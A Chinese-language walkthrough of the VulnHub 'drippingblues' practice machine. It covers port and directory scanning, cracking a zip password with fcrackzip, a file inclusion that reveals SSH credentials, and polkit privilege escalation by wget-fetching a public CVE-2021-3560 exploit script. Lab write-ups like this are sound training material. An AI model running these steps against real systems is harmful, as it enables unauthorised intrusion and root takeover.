vuhub drippingblues靶场攻略
靶场下载:
下载地址:https://download.vulnhub.com/drippingblues/drippingblues.ova
靶场攻略:
主机发现:
使用nmap 192.168.163.1/24扫描一下网段
端口扫描:
nmap -p-65535 -A 192.168.163.151
没有发现有其他端口。
访问80端口:
上面给了两个用户名。
页面扫描:
没有其他信息,尝试扫描一下其他页面
dirsearch -u http://192.168.163.151/
扫到了robots.txt
上面写了两个文件,挨个访问一下,
/etc/dripispowerful.html 403
/dripisreal.txt:
上面说让上面到一个网站找第n个歌词。
结果我也没弄懂他说的是哪个。
访问21端口:
他既然开21端口了,那么我们就试着访问一下
ftp://192.168.163.151
发现有一个压缩包,要解压时发现需要密码:
使用命令
fcrackzip -D -p /home/kali/rockyou.txt -u respectmydrip.zip
解压后找到了respectmydrip.txt文件
让我们专注drip
后来在网上查了其他攻略,发现首页有文件包含漏洞。参数是drip
我们包含/etc/dripispowerful.html 文件
右键查看源代码:
找到密码了。
上面用户名有两个,两组账号密码,是ssh的,那么挨个试一下,thugger/imdrippinbiatch成功登录。
sudo -l
find / -perm -u=s 2>/dev/null,查看里面的应用
发现有一个polkit
使用工具搜索一下polkit有什么漏洞:
searchsploit polkit
发现可以上传个脚本:
wget https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
但是这么上传时用不了的,我也不知道为什么,于是我使用账号密码进入虚拟机,把脚本拖到桌面上运行
